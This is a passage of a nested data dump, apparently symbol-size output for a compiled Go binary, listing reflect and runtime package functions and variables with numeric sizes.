26}, 'NumMethod': {'value': 26}, 'NumOut': {'value': 26}, 'Out': {'value': 25}, 'PkgPath': {'value': 25}, 'Size': {'value': 26}, 'String': {'value': 25}, 'common': {'value': 26}, 'uncommon': {'value': 26}}}, '(*structType).': {'children': {'Align': {'value': 26}, 'AssignableTo': {'value': 22}, 'Bits': {'value': 26}, 'ChanDir': {'value': 26}, 'Comparable': {'value': 22}, 'ConvertibleTo': {'value': 22}, 'Elem': {'value': 25}, 'Field': {'value': 512}, 'FieldAlign': {'value': 26}, 'FieldByIndex': 
{'value': 502}, 'FieldByName': {'value': 915}, 'FieldByName.': {'children': {'func1': {'value': 101}}}, 'FieldByNameFunc': {'value': 2803}, 'Implements': {'value': 22}, 'In': {'value': 25}, 'IsVariadic': {'value': 22}, 'Key': {'value': 25}, 'Kind': {'value': 26}, 'Len': {'value': 26}, 'Method': {'value': 68}, 'MethodByName': {'value': 73}, 'Name': {'value': 25}, 'NumField': {'value': 26}, 'NumIn': {'value': 26}, 'NumMethod': {'value': 26}, 'NumOut': {'value': 26}, 'Out': {'value': 25}, 'PkgPath': {'value': 25}, 'Size': {'value': 26}, 'String': {'value': 25}, 'common': {'value': 26}, 'uncommon': {'value': 26}}}, 'ChanDir.': {'children': {'String': {'value': 260}}}, 'FuncOf': {'value': 3006}, 'FuncOf.': {'children': {'func1': {'value': 514}}}, 'Kind.': {'children': {'String': {'value': 202}}}, 'New': {'value': 207}, 'TypeOf': {'value': 34}, 'Value.': {'children': {'Bool': {'value': 81}, 'Bytes': {'value': 182}, 'Elem': {'value': 457}, 'Field': {'value': 333}, 'Index': {'value': 564}, 'Interface': {'value': 105}, 'Kind': {'value': 15}, 'Len': {'value': 496}, 'MapIndex': {'value': 604}, 'MapKeys': {'value': 800}, 'NumField': {'value': 83}, 'NumMethod': {'value': 205}, 'Pointer': {'value': 464}, 'SetBytes': {'value': 217}, 'SetString': {'value': 126}, 'Slice': {'value': 724}, 'String': {'value': 293}, 'Type': {'value': 436}, 'assignTo': {'value': 1112}, 'runes': {'value': 182}, 'setRunes': {'value': 217}}}, 'Zero': {'value': 241}, 'addReflectOff': {'value': 375}, 'addTypeBits': {'value': 1347}, 'call': {'value': 5}, 'callMethod': {'value': 772}, 'chanlen': {'value': 29}, 'convertOp': {'value': 1317}, 'cvtBytesString': {'value': 240}, 'cvtComplex': {'value': 322}, 'cvtDirect': {'value': 212}, 'cvtFloat': {'value': 292}, 'cvtFloatInt': {'value': 296}, 'cvtFloatUint': {'value': 333}, 'cvtI2I': {'value': 504}, 'cvtInt': {'value': 356}, 'cvtIntFloat': {'value': 365}, 'cvtIntString': {'value': 400}, 'cvtRunesString': {'value': 240}, 'cvtStringBytes': {'value': 243}, 
'cvtStringRunes': {'value': 243}, 'cvtT2I': {'value': 430}, 'cvtUint': {'value': 372}, 'cvtUintFloat': {'value': 420}, 'cvtUintString': {'value': 416}, 'directlyAssignable': {'value': 196}, 'dummy': {'value': 24}, 'flag.': {'children': {'mustBe': {'value': 192}, 'mustBeAssignable': {'value': 506}}}, 'fnv1': {'value': 47}, 'funcLayout': {'value': 2942}, 'funcLayout.': {'children': {'func1': {'value': 81}}}, 'funcLookupCache': {'value': 48}, 'funcStr': {'value': 2409}, 'haveIdenticalType': {'value': 406}, 'haveIdenticalUnderlyingType': {'value': 3118}, 'ifaceE2I': {'value': 141}, 'implements': {'value': 2071}, 'init': {'value': 247}, 'initdone.': {'value': 1}, 'kindNames': {'value': 24}, 'layoutCache': {'value': 40}, 'makeBytes': {'value': 245}, 'makeComplex': {'value': 207}, 'makeFloat': {'value': 181}, 'makeInt': {'value': 209}, 'makeMethodValue': {'value': 624}, 'makeRunes': {'value': 245}, 'makeString': {'value': 232}, 'mapaccess': {'value': 107}, 'mapiterinit': {'value': 111}, 'mapiterkey': {'value': 14}, 'mapiternext': {'value': 60}, 'maplen': {'value': 29}, 'memmove': {'value': 80}, 'methodName': {'value': 146}, 'methodReceiver': {'value': 1070}, 'methodValueCall': {'value': 91}, 'methodValueCall.': {'children': {'args_stackmap': {'value': 8}}}, 'name.': {'children': {'pkgPath': {'value': 265}, 'tag': {'value': 142}, 'tagLen': {'value': 79}}}, 'newName': {'value': 829}, 'packEface': {'value': 249}, 'ptrMap': {'value': 40}, 'resolveNameOff': {'value': 78}, 'resolveReflectName': {'value': 68}, 'resolveTextOff': {'value': 78}, 'resolveTypeOff': {'value': 78}, 'statictmp_10': {'value': 16}, 'statictmp_107': {'value': 16}, 'statictmp_108': {'value': 16}, 'statictmp_11': {'value': 16}, 'statictmp_112': {'value': 16}, 'statictmp_114': {'value': 16}, 'statictmp_115': {'value': 16}, 'statictmp_116': {'value': 16}, 'statictmp_117': {'value': 16}, 'statictmp_118': {'value': 16}, 'statictmp_119': {'value': 16}, 'statictmp_12': {'value': 16}, 'statictmp_120': {'value': 
16}, 'statictmp_121': {'value': 16}, 'statictmp_124': {'value': 16}, 'statictmp_125': {'value': 16}, 'statictmp_13': {'value': 16}, 'statictmp_130': {'value': 16}, 'statictmp_131': {'value': 16}, 'statictmp_136': {'value': 16}, 'statictmp_137': {'value': 16}, 'statictmp_138': {'value': 16}, 'statictmp_14': {'value': 16}, 'statictmp_141': {'value': 16}, 'statictmp_142': {'value': 16}, 'statictmp_15': {'value': 16}, 'statictmp_16': {'value': 16}, 'statictmp_163': {'value': 16}, 'statictmp_164': {'value': 16}, 'statictmp_168': {'value': 432}, 'statictmp_169': {'value': 1}, 'statictmp_17': {'value': 16}, 'statictmp_18': {'value': 16}, 'statictmp_19': {'value': 16}, 'statictmp_20': {'value': 16}, 'statictmp_21': {'value': 16}, 'statictmp_22': {'value': 16}, 'statictmp_23': {'value': 16}, 'statictmp_24': {'value': 104}, 'statictmp_25': {'value': 8}, 'statictmp_26': {'value': 1}, 'statictmp_27': {'value': 16}, 'statictmp_28': {'value': 16}, 'statictmp_29': {'value': 16}, 'statictmp_3': {'value': 16}, 'statictmp_30': {'value': 16}, 'statictmp_34': {'value': 16}, 'statictmp_35': {'value': 16}, 'statictmp_36': {'value': 16}, 'statictmp_38': {'value': 16}, 'statictmp_39': {'value': 16}, 'statictmp_4': {'value': 16}, 'statictmp_48': {'value': 16}, 'statictmp_49': {'value': 8}, 'statictmp_5': {'value': 16}, 'statictmp_50': {'value': 16}, 'statictmp_51': {'value': 16}, 'statictmp_52': {'value': 1}, 'statictmp_53': {'value': 1}, 'statictmp_54': {'value': 16}, 'statictmp_6': {'value': 16}, 'statictmp_7': {'value': 80}, 'statictmp_77': {'value': 16}, 'statictmp_78': {'value': 40}, 'statictmp_8': {'value': 80}, 'statictmp_80': {'value': 16}, 'statictmp_82': {'value': 16}, 'statictmp_83': {'value': 16}, 'statictmp_9': {'value': 16}, 'typedmemclr': {'value': 70}, 'typedmemmove': {'value': 80}, 'typedmemmovepartial': {'value': 308}, 'typelinks': {'value': 966}, 'typesByString': {'value': 1074}, 'uint8Type': {'value': 8}, 'unsafe_New': {'value': 83}, 'valueInterface': {'value': 458}}}, 
'runtime.': {'children': {'go.itab.errorString,error': {'value': 32}, '(*Func).': {'children': {'Name': {'value': 127}, 'funcInfo': {'value': 83}}}, '(*TypeAssertionError).': {'children': {'Error': {'value': 1102}}}, '(*_type).': {'children': {'nameOff': {'value': 78}, 'pkgpath': {'value': 257}, 'string': {'value': 175}, 'textOff': {'value': 800}, 'typeOff': {'value': 78}, 'uncommon': {'value': 170}}}, '(*bucket).': {'children': {'bp': {'value': 108}, 'mp': {'value': 99}}}, '(*cpuProfile).': {'children': {'add': {'value': 285}, 'addExtra': {'value': 586}, 'addNonGo': {'value': 238}}}, '(*errorString).': {'children': {'Error': {'value': 128}}}, '(*fixalloc).': {'children': {'alloc': {'value': 366}}}, '(*gcControllerState).': {'children': {'endCycle': {'value': 1207}, 'enlistWorker': {'value': 379}, 'findRunnableGCWorker': {'value': 619}, 'revise': {'value': 265}, 'startCycle': {'value': 896}}}, '(*gcSweepBuf).': {'children': {'block': {'value': 212}, 'push': {'value': 435}}}, '(*gcWork).': {'children': {'balance': {'value': 182}, 'dispose': {'value': 214}, 'get': {'value': 230}, 'init': {'value': 97}, 'put': {'value': 255}, 'putBatch': {'value': 464}, 'tryGet': {'value': 230}}}, '(*hmap).': {'children': {'incrnoverflow': {'value': 130}, 'newoverflow': {'value': 695}}}, '(*itab).': {'children': {'init': {'value': 1115}}}, '(*itabTableType).': {'children': {'add': {'value': 83}, 'add-fm': {'value': 69}, 'find': {'value': 96}}}, '(*lfstack).': {'children': {'pop': {'value': 55}, 'push': {'value': 346}}}, '(*linearAlloc).': {'children': {'alloc': {'value': 215}}}, '(*mSpanList).': {'children': {'insert': {'value': 277}, 'insertBack': {'value': 279}, 'remove': {'value': 402}, 'takeAll': {'value': 88}}}, '(*mTreap).': {'children': {'insert': {'value': 743}, 'remove': {'value': 192}, 'removeNode': {'value': 304}, 'removeSpan': {'value': 143}, 'rotateLeft': {'value': 193}, 'rotateRight': {'value': 189}}}, '(*mcache).': {'children': {'nextFree': {'value': 611}, 'nextFree.': 
{'children': {'func1': {'value': 67}}}, 'refill': {'value': 308}, 'releaseAll': {'value': 158}}}, '(*mcentral).': {'children': {'cacheSpan': {'value': 1116}, 'freeSpan': {'value': 391}, 'grow': {'value': 378}, 'uncacheSpan': {'value': 283}}}, '(*mheap).': {'children': {'alloc': {'value': 230}, 'alloc.': {'children': {'func1': {'value': 106}}}, 'allocLarge': {'value': 88}, 'allocManual': {'value': 224}, 'allocSpanLocked': {'value': 1028}, 'alloc_m': {'value': 803}, 'freeManual': {'value': 176}, 'freeSpan': {'value': 125}, 'freeSpan.': {'children': {'func1': {'value': 293}}}, 'freeSpanLocked': {'value': 1498}, 'grow': {'value': 483}, 'init': {'value': 1273}, 'reclaim': {'value': 426}, 'reclaimList': {'value': 336}, 'scavenge': {'value': 785}, 'setSpans': {'value': 194}, 'sysAlloc': {'value': 1661}}}, '(*mspan).': {'children': {'countAlloc': {'value': 134}, 'ensureSwept': {'value': 216}, 'nextFreeIndex': {'value': 380}, 'refillAllocCache': {'value': 25}, 'sweep': {'value': 2384}}}, '(*pcExpander).': {'children': {'init': {'value': 592}, 'next': {'value': 1079}}}, '(*plainError).': {'children': {'Error': {'value': 128}}}, '(*pollCache).': {'children': {'alloc': {'value': 203}, 'free': {'value': 92}}}, '(*profBuf).': {'children': {'canWriteRecord': {'value': 160}, 'canWriteTwoRecords': {'value': 219}, 'incrementOverflow': {'value': 69}, 'takeOverflow': {'value': 105}, 'wakeupExtra': {'value': 111}, 'write': {'value': 1125}}}, '(*randomOrder).': {'children': {'reset': {'value': 275}}}, '(*rwmutex).': {'children': {'rlock': {'value': 132}, 'rlock.': {'children': {'func1': {'value': 198}}}, 'runlock': {'value': 249}}}, '(*semaRoot).': {'children': {'dequeue': {'value': 885}, 'queue': {'value': 1103}, 'rotateLeft': {'value': 530}, 'rotateRight': {'value': 490}}}, '(*sigctxt).': {'children': {'preparePanic': {'value': 237}}}, '(*stackExpander).': {'children': {'next': {'value': 936}}}, '(*traceAlloc).': {'children': {'alloc': {'value': 274}}}, '(*traceBuf).': {'children': 
{'varint': {'value': 117}}}, '(*traceStackTable).': {'children': {'find': {'value': 170}, 'newStack': {'value': 94}, 'put': {'value': 498}}}, '(*waitReason).': {'children': {'String': {'value': 118}}}, '(*waitq).': {'children': {'dequeue': {'value': 240}}}, '(*wbBuf).': {'children': {'reset': {'value': 149}}}, '(*workbuf).': {'children': {'checkempty': {'value': 85}, 'checknonempty': {'value': 85}}}, '.gobytes.': {'children': {'4': {'value': 16}, '5': {'value': 13}, '6': {'value': 42}}}, 'Caller': {'value': 757}, 'FuncForPC': {'value': 70}, 'GOMAXPROCS': {'value': 188}, 'GOROOT': {'value': 133}, 'Gosched': {'value': 40}, 'MemProfileRate': {'value': 8}, 'SetFinalizer': {'value': 2034}, 'SetFinalizer.': {'children': {'func1': {'value': 63}, 'func2': {'value': 143}}}, '_ExternalCode': {'value': 48}, '_GC': {'value': 48}, '_LostExternalCode': {'value': 48}, '_System': {'value': 48}, '_VDSO': {'value': 48}, '_cgo_setenv': {'value': 8}, '_cgo_unsetenv': {'value': 8}, 'abort': {'value': 4}, 'acquireSudog': {'value': 918}, 'acquirep': {'value': 108}, 'acquirep1': {'value': 377}, 'addfinalizer': {'value': 648}, 'addrspace_vec': {'value': 1}, 'addspecial': {'value': 449}, 'adjustctxt': {'value': 100}, 'adjustdefers': {'value': 230}, 'adjustframe': {'value': 630}, 'adjustpointers': {'value': 557}, 'adjustsudogs': {'value': 69}, 'advanceEvacuationMark': {'value': 219}, 'aeshash': {'value': 20}, 'aeshash32': {'value': 51}, 'aeshash64': {'value': 52}, 'aeshashbody': {'value': 1349}, 'aeshashstr': {'value': 22}, 'aeskeysched': {'value': 128}, 'algarray': {'value': 224}, 'alginit': {'value': 210}, 'allfin': {'value': 8}, 'allgadd': {'value': 319}, 'allglen': {'value': 8}, 'allglock': {'value': 8}, 'allgs': {'value': 24}, 'allm': {'value': 8}, 'allocm': {'value': 678}, 'allocmcache': {'value': 166}, 'allp': {'value': 24}, 'allpLock': {'value': 8}, 'argc': {'value': 4}, 'args': {'value': 109}, 'argslice': {'value': 24}, 'argv': {'value': 8}, 'arm64_support_atomics': {'value': 1}, 
'asmcgocall': {'value': 186}, 'asmcgocall.': {'children': {'args_stackmap': {'value': 10}}}, 'asminit': {'value': 1}, 'assertE2I': {'value': 222}, 'assertE2I2': {'value': 163}, 'atoi': {'value': 295}, 'atoi32': {'value': 119}, 'atomicstorep': {'value': 75}, 'atomicwb': {'value': 131}, 'badctxt': {'value': 41}, 'badmcall': {'value': 63}, 'badmcall2': {'value': 63}, 'badmorestackg0': {'value': 60}, 'badmorestackg0Msg': {'value': 16}, 'badmorestackgsignal': {'value': 60}, 'badmorestackgsignalMsg': {'value': 16}, 'badreflectcall': {'value': 66}, 'badsignal': {'value': 86}, 'badsystemstack': {'value': 60}, 'badsystemstackMsg': {'value': 16}, 'badunlockosthread': {'value': 63}, 'bbuckets': {'value': 8}, 'bgsweep': {'value': 305}, 'blockevent': {'value': 125}, 'blockprofilerate': {'value': 8}, 'blocksampled': {'value': 131}, 'bucketmem': {'value': 8}, 'buckhash': {'value': 8}, 'buildVersion': {'value': 16}, 'bulkBarrierBitmap': {'value': 442}, 'bulkBarrierPreWrite': {'value': 1275}, 'c128equal': {'value': 59}, 'c128hash': {'value': 110}, 'c64equal': {'value': 57}, 'c64hash': {'value': 110}, 'cachestats': {'value': 126}, 'call1024': {'value': 176}, 'call1024.': {'children': {'args_stackmap': {'value': 9}}}, 'call1048576': {'value': 198}, 'call1048576.': {'children': {'args_stackmap': {'value': 9}}}, 'call1073741824': {'value': 198}, 'call1073741824.': {'children': {'args_stackmap': {'value': 9}}}, 'call128': {'value': 173}, 'call128.': {'children': {'args_stackmap': {'value': 9}}}, 'call131072': {'value': 198}, 'call131072.': {'children': {'args_stackmap': {'value': 9}}}, 'call134217728': {'value': 198}, 'call134217728.': {'children': {'args_stackmap': {'value': 9}}}, 'call16384': {'value': 198}, 'call16384.': {'children': {'args_stackmap': {'value': 9}}}, 'call16777216': {'value': 198}, 'call16777216.': {'children': {'args_stackmap': {'value': 9}}}, 'call2048': {'value': 176}, 'call2048.': {'children': {'args_stackmap': {'value': 9}}}, 'call2097152': {'value': 198}, 
'call2097152.': {'children': {'args_stackmap': {'value': 9}}}, 'call256': {'value': 176}, 'call256.': {'children': {'args_stackmap': {'value': 9}}}, 'call262144': {'value': 198}, 'call262144.': {'children': {'args_stackmap': {'value': 9}}}, 'call268435456': {'value': 198}, 'call268435456.': {'children': {'args_stackmap': {'value': 9}}}, 'call32': {'value': 126}, 'call32.': {'children': {'args_stackmap': {'value': 9}}}, 'call32768': {'value': 198}, 'call32768.': {'children': {'args_stackmap': {'value': 9}}}, 'call33554432': {'value': 198}, 'call33554432.': {'children': {'args_stackmap': {'value': 9}}}, 'call4096': {'value': 198}, 'call4096.': {'children': {'args_stackmap': {'value': 9}}}, 'call4194304': {'value': 198}, 'call4194304.': {'children': {'args_stackmap': {'value': 9}}}, 'call512': {'value': 176}, 'call512.': {'children': {'args_stackmap': {'value': 9}}}, 'call524288': {'value': 198}, 'call524288.': {'children': {'args_stackmap': {'value': 9}}}, 'call536870912': {'value': 198}, 'call536870912.': {'children': {'args_stackmap': {'value': 9}}}, 'call64': {'value': 126}, 'call64.': {'children': {'args_stackmap': {'value': 9}}}, 'call65536': {'value': 198}, 'call65536.': {'children': {'args_stackmap': {'value': 9}}}, 'call67108864': {'value': 198}, 'call67108864.': {'children': {'args_stackmap': {'value': 9}}}, 'call8192': {'value': 198}, 'call8192.': {'children': {'args_stackmap': {'value': 9}}}, 'call8388608': {'value': 198}, 'call8388608.': {'children': {'args_stackmap': {'value': 9}}}, 'callCgoMmap': {'value': 81}, 'callCgoMunmap': {'value': 58}, 'callCgoSigaction': {'value': 62}, 'callCgoSymbolizer': {'value': 125}, 'callers': {'value': 220}, 'callers.': {'children': {'func1': {'value': 171}}}, 'cansemacquire': {'value': 39}, 'casfrom_Gscanstatus': {'value': 1101}, 'casgstatus': {'value': 515}, 'casgstatus.': {'children': {'func1': {'value': 179}, 'func2': {'value': 253}}}, 'casp': {'value': 89}, 'castogscanstatus': {'value': 219}, 'cgoCheckBits': 
{'value': 237}, 'cgoCheckMemmove': {'value': 160}, 'cgoCheckSliceCopy': {'value': 216}, 'cgoCheckTypedBlock': {'value': 900}, 'cgoCheckTypedBlock.': {'children': {'func1': {'value': 86}}}, 'cgoCheckUsingType': {'value': 606}, 'cgoCheckWriteBarrier': {'value': 222}, 'cgoCheckWriteBarrier.': {'children': {'func1': {'value': 181}}}, 'cgoContextPCs': {'value': 211}, 'cgoHasExtraM': {'value': 1}, 'cgoIsGoPointer': {'value': 238}, 'cgoSigtramp': {'value': 187}, 'cgoSymbolizer': {'value': 8}, 'cgoTraceback': {'value': 8}, 'cgo_yield': {'value': 8}, 'cgocall': {'value': 234}, 'chanrecv': {'value': 1640}, 'chanrecv.': {'children': {'func1': {'value': 65}}}, 'chanrecv1': {'value': 53}, 'chanrecvpc': {'value': 8}, 'chansend': {'value': 1514}, 'chansend.': {'children': {'func1': {'value': 65}}}, 'chansend1': {'value': 63}, 'chansendpc': {'value': 8}, 'check': {'value': 1146}, 'checkASM': {'value': 29}, 'checkASM.': {'children': {'args_stackmap': {'value': 10}}}, 'checkdead': {'value': 1181}, 'checkmcount': {'value': 184}, 'class_to_allocnpages': {'value': 67}, 'class_to_divmagic': {'value': 402}, 'class_to_size': {'value': 134}, 'clearCheckmarks': {'value': 307}, 'clearpools': {'value': 351}, 'clone': {'value': 129}, 'closechan': {'value': 648}, 'closefd': {'value': 29}, 'closeonexec': {'value': 26}, 'cmpstring': {'value': 30}, 'concatstring2': {'value': 108}, 'concatstring3': {'value': 111}, 'concatstring4': {'value': 114}, 'concatstring5': {'value': 114}, 'concatstrings': {'value': 730}, 'contains': {'value': 101}, 'convT2E': {'value': 135}, 'convT2E32': {'value': 117}, 'convT2Enoptr': {'value': 138}, 'convT2Eslice': {'value': 171}, 'convT2Estring': {'value': 159}, 'convT2I64': {'value': 125}, 'copystack': {'value': 830}, 'cpuinit': {'value': 463}, 'cpuprof': {'value': 8040}, 'cputicks': {'value': 32}, 'crash': {'value': 36}, 'crashing': {'value': 4}, 'createfing': {'value': 106}, 'dbgvars': {'value': 24}, 'deadlock': {'value': 8}, 'debug': {'value': 60}, 'debugCallCheck': 
{'value': 225}, 'debugCallCheck.': {'children': {'func1': {'value': 508}}}, 'debugCallPanicked': {'value': 51}, 'debugCallV1': {'value': 649}, 'debugCallWrap': {'value': 171}, 'debugCallWrap.': {'children': {'func1': {'value': 96}}}, 'debuglock': {'value': 8}, 'decoderune': {'value': 454}, 'deductSweepCredit': {'value': 370}, 'deferType': {'value': 8}, 'deferproc': {'value': 289}, 'deferreturn': {'value': 280}, 'deltimer': {'value': 529}, 'didothers': {'value': 1}, 'dieFromSignal': {'value': 151}, 'divideError': {'value': 16}, 'dopanic_m': {'value': 904}, 'dropm': {'value': 233}, 'duffcopy': {'value': 897}, 'duffzero': {'value': 305}, 'dumpregs': {'value': 1848}, 'earlycgocallback': {'value': 24}, 'efaceeq': {'value': 310}, 'emptymspan': {'value': 152}, 'encoderune': {'value': 337}, 'entersyscall': {'value': 48}, 'entersyscall_gcwait': {'value': 229}, 'entersyscall_sysmon': {'value': 117}, 'entersyscallblock': {'value': 431}, 'entersyscallblock.': {'children': {'func1': {'value': 308}, 'func2': {'value': 308}}}, 'entersyscallblock_handoff': {'value': 104}, 'envs': {'value': 24}, 'epfd': {'value': 4}, 'epollcreate': {'value': 16}, 'epollcreate1': {'value': 16}, 'epollctl': {'value': 29}, 'epollwait': {'value': 37}, 'eqslice': {'value': 68}, 'errorString.': {'children': {'Error': {'value': 120}}}, 'evacuate': {'value': 1635}, 'evacuate_fast32': {'value': 1054}, 'evacuate_fast64': {'value': 1193}, 'evacuate_faststr': {'value': 1143}, 'execLock': {'value': 48}, 'execute': {'value': 365}, 'exit': {'value': 12}, 'exitThread': {'value': 27}, 'exitsyscall': {'value': 577}, 'exitsyscall0': {'value': 476}, 'exitsyscallfast': {'value': 303}, 'exitsyscallfast.': {'children': {'func1': {'value': 167}}}, 'exitsyscallfast_pidle': {'value': 216}, 'exitsyscallfast_reacquired': {'value': 175}, 'exitsyscallfast_reacquired.': {'children': {'func1': {'value': 83}}}, 'expandCgoFrames': {'value': 794}, 'extendRandom': {'value': 226}, 'extraMCount': {'value': 4}, 'extraMWaiters': 
{'value': 4}, 'extram': {'value': 8}, 'f32equal': {'value': 34}, 'f32hash': {'value': 281}, 'f64equal': {'value': 35}, 'f64hash': {'value': 283}, 'faketime': {'value': 8}, 'fastexprand': {'value': 378}, 'fastlog2Table': {'value': 264}, 'fastrand': {'value': 68}, 'fatalpanic': {'value': 169}, 'fatalpanic.': {'children': {'func1': {'value': 192}, 'func2': {'value': 58}}}, 'fatalthrow': {'value': 106}, 'fatalthrow.': {'children': {'func1': {'value': 144}}}, 'finalizer1': {'value': 5}, 'finc': {'value': 8}, 'findObject': {'value': 962}, 'findfunc': {'value': 371}, 'findfunctab': {'value': 2648}, 'findmoduledatap': {'value': 60}, 'findnull': {'value': 188}, 'findrunnable': {'value': 2938}, 'findsghi': {'value': 79}, 'fing': {'value': 8}, 'fingCreate': {'value': 4}, 'fingRunning': {'value': 1}, 'fingwait': {'value': 1}, 'fingwake': {'value': 1}, 'finishsweep_m': {'value': 71}, 'finlock': {'value': 8}, 'finptrmask': {'value': 64}, 'finq': {'value': 8}, 'firstmoduledata': {'value': 456}, 'float64frombits': {'value': 13}, 'floatError': {'value': 16}, 'flushmcache': {'value': 128}, 'fmtNSAsMS': {'value': 389}, 'forEachP': {'value': 910}, 'forcegc': {'value': 24}, 'forcegchelper': {'value': 282}, 'forcegcperiod': {'value': 8}, 'framepointer_enabled': {'value': 1}, 'freeSomeWbufs': {'value': 223}, 'freeSomeWbufs.': {'children': {'func1': {'value': 233}}}, 'freeStackSpans': {'value': 412}, 'freedefer': {'value': 507}, 'freedefer.': {'children': {'func1': {'value': 388}}}, 'freedeferfn': {'value': 63}, 'freedeferpanic': {'value': 63}, 'freemcache': {'value': 90}, 'freemcache.': {'children': {'func1': {'value': 183}}}, 'freespecial': {'value': 349}, 'freezetheworld': {'value': 166}, 'freezing': {'value': 4}, 'funcPC': {'value': 21}, 'funcdata': {'value': 217}, 'funcfile': {'value': 173}, 'funcline': {'value': 113}, 'funcline1': {'value': 393}, 'funcname': {'value': 126}, 'funcnameFromNameoff': {'value': 140}, 'funcspdelta': {'value': 357}, 'futex': {'value': 40}, 'futexsleep': 
{'value': 202}, 'futexwakeup': {'value': 155}, 'futexwakeup.': {'children': {'func1': {'value': 164}}}, 'fwdSig': {'value': 520}, 'g0': {'value': 376}, 'gStatusStrings': {'value': 144}, 'gcAssistAlloc': {'value': 620}, 'gcAssistAlloc.': {'children': {'func1': {'value': 68}}}, 'gcAssistAlloc1': {'value': 903}, 'gcBgMarkStartWorkers': {'value': 201}, 'gcBgMarkWorker': {'value': 1239}, 'gcBgMarkWorker.': {'children': {'func1': {'value': 117}, 'func2': {'value': 459}}}, 'gcBitsArenas': {'value': 40}, 'gcBlackenEnabled': {'value': 4}, 'gcBlackenPromptly': {'value': 1}, 'gcController': {'value': 152}, 'gcDrain': {'value': 1132}, 'gcDrainN': {'value': 525}, 'gcDumpObject': {'value': 1163}, 'gcFlushBgCredit': {'value': 457}, 'gcMark': {'value': 742}, 'gcMarkDone': {'value': 639}, 'gcMarkDone.': {'children': {'func1': {'value': 62}, 'func1.': {'children': {'1': {'value': 82}}}}}, 'gcMarkRootCheck': {'value': 682}, 'gcMarkRootPrepare': {'value': 408}, 'gcMarkTermination': {'value': 2866}, 'gcMarkTermination.': {'children': {'func1': {'value': 62}, 'func2': {'value': 440}, 'func3': {'value': 55}}}, 'gcMarkTinyAllocs': {'value': 269}, 'gcParkAssist': {'value': 349}, 'gcResetMarkState': {'value': 167}, 'gcSetTriggerRatio': {'value': 1011}, 'gcStart': {'value': 1416}, 'gcStart.': {'children': {'func1': {'value': 48}, 'func2': {'value': 83}}}, 'gcSweep': {'value': 417}, 'gcWaitOnMark': {'value': 185}, 'gcWakeAllAssists': {'value': 133}, 'gcWriteBarrier': {'value': 249}, 'gcallers': {'value': 169}, 'gcbss': {'value': 712}, 'gcd': {'value': 29}, 'gcdata': {'value': 468}, 'gcenable': {'value': 138}, 'gchelper': {'value': 254}, 'gchelperstart': {'value': 133}, 'gcinit': {'value': 207}, 'gcmarknewobject': {'value': 200}, 'gcpercent': {'value': 4}, 'gcphase': {'value': 4}, 'gcprocs': {'value': 150}, 'gcstopm': {'value': 277}, 'gentraceback': {'value': 7313}, 'getArgInfo': {'value': 484}, 'getRandomData': {'value': 336}, 'getStackMap': {'value': 2068}, 'getargp': {'value': 11}, 
'getempty': {'value': 550}, 'getempty.': {'children': {'func1': {'value': 105}}}, 'getfull': {'value': 769}, 'getitab': {'value': 901}, 'getproccount': {'value': 257}, 'getsig': {'value': 78}, 'gettid': {'value': 12}, 'gfget': {'value': 486}, 'gfget.': {'children': {'func1': {'value': 89}}}, 'gfpurge': {'value': 316}, 'gfput': {'value': 519}, 'globalAlloc': {'value': 24}, 'globrunqget': {'value': 298}, 'goargs': {'value': 293}, 'goenvs': {'value': 48}, 'goenvs_unix': {'value': 327}, 'goexit': {'value': 7}, 'goexit0': {'value': 732}, 'goexit1': {'value': 81}, 'gogetenv': {'value': 298}, 'gogo': {'value': 87}, 'gomaxprocs': {'value': 4}, 'gopanic': {'value': 1389}, 'gopark': {'value': 318}, 'goparkunlock': {'value': 100}, 'gopreempt_m': {'value': 79}, 'goready': {'value': 109}, 'goready.': {'children': {'func1': {'value': 73}}}, 'gorecover': {'value': 72}, 'goroutineheader': {'value': 709}, 'goschedImpl': {'value': 642}, 'gosched_m': {'value': 79}, 'gostring': {'value': 198}, 'gostringnocopy': {'value': 81}, 'gosweepone': {'value': 109}, 'gosweepone.': {'children': {'func1': {'value': 72}}}, 'greyobject': {'value': 1299}, 'growWork': {'value': 163}, 'growWork_fast32': {'value': 163}, 'growWork_fast64': {'value': 163}, 'growWork_faststr': {'value': 163}, 'growslice': {'value': 1758}, 'gwrite': {'value': 317}, 'handlingSig': {'value': 260}, 'handoff': {'value': 180}, 'handoffp': {'value': 752}, 'hashGrow': {'value': 545}, 'hashkey': {'value': 32}, 'haveexperiment': {'value': 502}, 'heapBits.': {'children': {'clearCheckmarkSpan': {'value': 167}, 'forward': {'value': 173}, 'forwardOrBoundary': {'value': 180}, 'initCheckmarkSpan': {'value': 311}, 'initSpan': {'value': 520}, 'nextArena': {'value': 108}}}, 'heapBitsSetType': {'value': 2613}, 'heapBitsSetTypeGCProg': {'value': 872}, 'heapminimum': {'value': 8}, 'helpgc': {'value': 397}, 'hexdumpWords': {'value': 590}, 'hexdumpWords.': {'children': {'func1': {'value': 147}}}, 'ifaceeq': {'value': 314}, 'inForkedChild': 
{'value': 1}, 'inHeapOrStack': {'value': 134}, 'inVDSOPage': {'value': 98}, 'incidlelocked': {'value': 107}, 'index': {'value': 246}, 'indexError': {'value': 16}, 'inf': {'value': 8}, 'init': {'value': 264}, 'init.': {'children': {'0': {'value': 99}, '1': {'value': 1}, '2': {'value': 138}, '3': {'value': 114}, '4': {'value': 70}, '5': {'value': 1}}}, 'initAlgAES': {'value': 204}, 'initCheckmarks': {'value': 307}, 'initSigmask': {'value': 8}, 'initdone.': {'value': 1}, 'initsig': {'value': 520}, 'injectglist': {'value': 395}, 'interequal': {'value': 107}, 'interhash': {'value': 384}, 'intstring': {'value': 287}, 'isIntel': {'value': 1}, 'isSystemGoroutine': {'value': 230}, 'isarchive': {'value': 1}, 'iscgo': {'value': 1}, 'islibrary': {'value': 1}, 'itabAdd': {'value': 332}, 'itabLock': {'value': 8}, 'itabTable': {'value': 8}, 'itabTableInit': {'value': 4112}, 'itabsinit': {'value': 233}, 'iterate_itabs': {'value': 121}, 'itoaDiv': {'value': 218}, 'jmpdefer': {'value': 29}, 'largeAlloc': {'value': 397}, 'lastmoduledatap': {'value': 8}, 'lfenceBeforeRdtsc': {'value': 1}, 'lfnodeValidate': {'value': 180}, 'lock': {'value': 413}, 'lockextra': {'value': 190}, 'm0': {'value': 832}, 'mProf': {'value': 8}, 'mProf_Flush': {'value': 104}, 'mProf_FlushLocked': {'value': 228}, 'mProf_Free': {'value': 175}, 'mProf_Malloc': {'value': 461}, 'mProf_Malloc.': {'children': {'func1': {'value': 68}}}, 'mProf_NextCycle': {'value': 120}, 'mSpanStateNames': {'value': 24}, 'mSysStatDec': {'value': 